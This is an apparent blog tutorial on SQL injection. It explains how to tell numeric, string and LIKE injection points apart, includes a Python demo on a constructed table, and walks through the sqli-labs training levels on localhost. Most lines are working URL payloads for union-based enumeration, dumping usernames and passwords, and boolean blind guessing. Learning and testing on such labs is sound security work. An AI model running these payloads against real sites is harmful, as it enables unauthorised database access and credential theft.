Detailed explanation of SQL injection Foundation
2022-07-20 20:39:00 【Nailaoyyds】
Catalog
Preface
Classification of injection point types
Numeric:
select * from tabname where id = 1
Character (string):
select * from tabname where id = '1'
Search (LIKE):
select * from tabname where id like '%1%'
Procedure for determining the type
Input 1
Suppose the query returns results; at this point the three types cannot yet be told apart.
Input 1 and 1 = 1
For a numeric injection point:
select * from tabname where id = 1 and 1 = 1   -> the query returns results
For a character injection point:
select * from tabname where id = '1 and 1 = 1'   -> no results (the whole input is compared as one string)
For a search injection point:
select * from tabname where id like '%1 and 1 = 1%'   -> no results
This step identifies numeric injection points. Caveat: if the underlying column is numeric, MySQL silently casts the string '1 and 1 = 1' to the number 1 (with a warning), so a character-type query may still return a row. Always pair the probe with 1 and 1 = 2: a true numeric point returns nothing for it, whereas the cast string still returns the row.
Input 1' and '1'='1
For a character injection point:
select * from tabname where id = '1' and '1'='1'   -> the query returns results
For a search injection point:
select * from tabname where id like '%1' and '1'='1%'   -> no results ('1'='1%' is false)
This step identifies character injection points.
Once numeric and character types are excluded, what remains is probably a search (LIKE) injection point; confirm it with 1%' and '%'=' which rebuilds the pattern on both sides (like '%1%' and '%'='%') and must return results again.
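The decision procedure above, run end to end against the three query shapes. This is an added example, not code from the original post: it uses an in-memory SQLite table with constructed rows (the "tabname" of the page) and a deliberately vulnerable string-spliced query so the probes behave exactly as the tutorial describes. Each type is confirmed with a positive and a negative probe, because on MySQL the implicit string-to-number cast mentioned above can make the character template answer the numeric probe with a row; SQLite does not cast a non-numeric string, so both probes behave the same here.

```python
import sqlite3

# Constructed sample table standing in for the page's "tabname" (not real data).
ROWS = [(1, "apple"), (2, "banana"), (11, "cherry")]

# The three vulnerable query shapes from the page; user input is spliced in
# as text, which is exactly the bug that makes the classification work.
TEMPLATES = {
    "numeric":   "SELECT * FROM tabname WHERE id = {}",
    "character": "SELECT * FROM tabname WHERE id = '{}'",
    "search":    "SELECT * FROM tabname WHERE id LIKE '%{}%'",
}

CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE tabname (id INTEGER, name TEXT)")
CONN.executemany("INSERT INTO tabname VALUES (?, ?)", ROWS)


def returns_rows(kind, user_input):
    """Boolean oracle: True if the spliced query yields at least one row,
    False when it yields nothing or fails to parse (both look like
    'no result' to an attacker who only sees the rendered page)."""
    sql = TEMPLATES[kind].format(user_input)
    try:
        return bool(CONN.execute(sql).fetchall())
    except sqlite3.Error:
        return False


def classify(kind):
    """Run the page's decision procedure against one query shape.
    Every type needs a true probe that keeps the row AND a false probe
    that removes it; a single true probe is not enough (see the MySQL
    cast caveat in the text)."""
    if not returns_rows(kind, "1"):
        return "no baseline result"
    # numeric: no quote needed, the condition is appended directly
    if returns_rows(kind, "1 and 1 = 1") and not returns_rows(kind, "1 and 1 = 2"):
        return "numeric"
    # character: close the string, add the condition, reopen for the trailing quote
    if returns_rows(kind, "1' and '1'='1") and not returns_rows(kind, "1' and '1'='2"):
        return "character"
    # search: the same idea, but both halves must rebuild a valid LIKE pattern
    if returns_rows(kind, "1%' and '%'='") and not returns_rows(kind, "1%' and '%'='x"):
        return "search"
    return "unknown"


if __name__ == "__main__":
    for kind in TEMPLATES:
        print(f"{kind:10s} -> {classify(kind)}")
```

Against a real target the same three probe pairs are sent as the id parameter and "returns rows" is replaced by whatever the page shows for a hit (content, length, or status code).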
Character injection (sqli-labs Less-1)
http://127.0.0.1/sqli-labs-master/Less-1/   # normal page
?id=1
?id=1'   # error: the appended single quote leaves an unterminated string after 1
?id=1"   # page normal: the double quote is not the closing character
An error on one closing character and a normal page on the other indicates an injection point.
?id=1'--+   # page normal again: --+ is a MySQL comment (-- needs a following space, and + decodes to a space in the URL) and removes the rest of the original statement
?id=1 and 1=2   # no change: without the quote the condition stays inside the string, so this is single-quote character injection
order by to determine the number of columns
?id=1' order by 4--+   # error, so there are only three columns
?id=1' order by 3--+   # normal
union select to find which columns are echoed
?id=100' union select 1,2,3--+   # id=100 does not exist, so the original SELECT returns nothing and the union row is displayed: 2 and 3 appear on the page, so columns 2 and 3 are the echo positions (union select 1,2 and union select 1,2,3,4 both error because the column count must match)
Enumerate databases
?id=100' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Query the database version and current database name
?id=100' union select 1,version(),database()--+
Query the table names
?id=100' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
Query the column names
?id=100' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
Query the users
?id=100' union select 1,2,group_concat(username) from security.users--+
Query usernames and passwords (0x3a is ':' as a separator)
?id=100' union select 1,2,group_concat(username,0x3a,password) from users--+
Numeric injection (sqli-labs Less-2)
http://127.0.0.1/sqli-labs-master/Less-2/
?id=1
?id=1'
?id=1"
?id=1 and 1=1   # normal echo: numeric injection needs no quote to close a string, character injection does
?id=1 and 1=2   # empty result, confirming a numeric point
?id=1 order by 4   # error: only three columns
?id=1 order by 3   # normal
# Query the database version and name (no quote is needed to close, unlike the character type)
?id=100 union select 1,version(),database()
# Query the table names
?id=100 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')
# Query the column names
?id=100 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')
# Query the field contents
?id=100 union select 1,2,group_concat(username,0x3a,password) from users
Identifying the closure from the error message
Single quote with parenthesis (sqli-labs Less-3)
http://127.0.0.1/sqli-labs-master/Less-3/
?id=1
?id=1'   # the error message shows a closing parenthesis, so the parameter is wrapped as ('...')
?id=1') order by 4 --+   # error
?id=1') order by 3 --+   # normal
?id=100') union select 1,version(),database()--+   # query the database version
Double quote with parenthesis (sqli-labs Less-4, wrapped as ("..."))
?id=100") union select 1,version(),database()--+
Boolean-based blind injection (sqli-labs Less-5)
http://127.0.0.1/sqli-labs-master/Less-5/?id=1
?id=1'
?id=1' order by 4--+
?id=1' order by 3--+
?id=1' and left((select database()),1)='s'--+   # left() takes the first character of the database name; the page answering "You are in" means the guess is right
?id=1' and left((select database()),1)<'t'--+   # echo, so the first character is less than 't'
?id=1' and left((select database()),1)>'t'--+   # no echo, so it is not greater than 't'; narrow the range character by character until the full name is recovered: security
Confirm the table names
?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),6)='emails'--+   # echo, so the first table is emails. Repeat with a different limit x,1 offset and left() length for each table: the first table is emails, the second is referers, and the fourth is the user table, users.
?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),7)='referer'--+
?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users'--+
Confirm the columns: the second column of users is username and the third is password (the query must select column_name from information_schema.columns, not table_name)
?id=1' and left((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),8)='username'--+   # It's strange: it did not work at first, then it worked again after a while
?id=1' and left((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 2,1),8)='password'--+
Extract the data
?id=1' and left((select password from users order by id limit 0,1),4)='dump'--+   # guess the password prefix the same way. Caveat: MySQL's default collations are case-insensitive, so left(...)='dump' also matches 'Dump'; compare with binary (binary left(...)='Dump') when the exact case matters.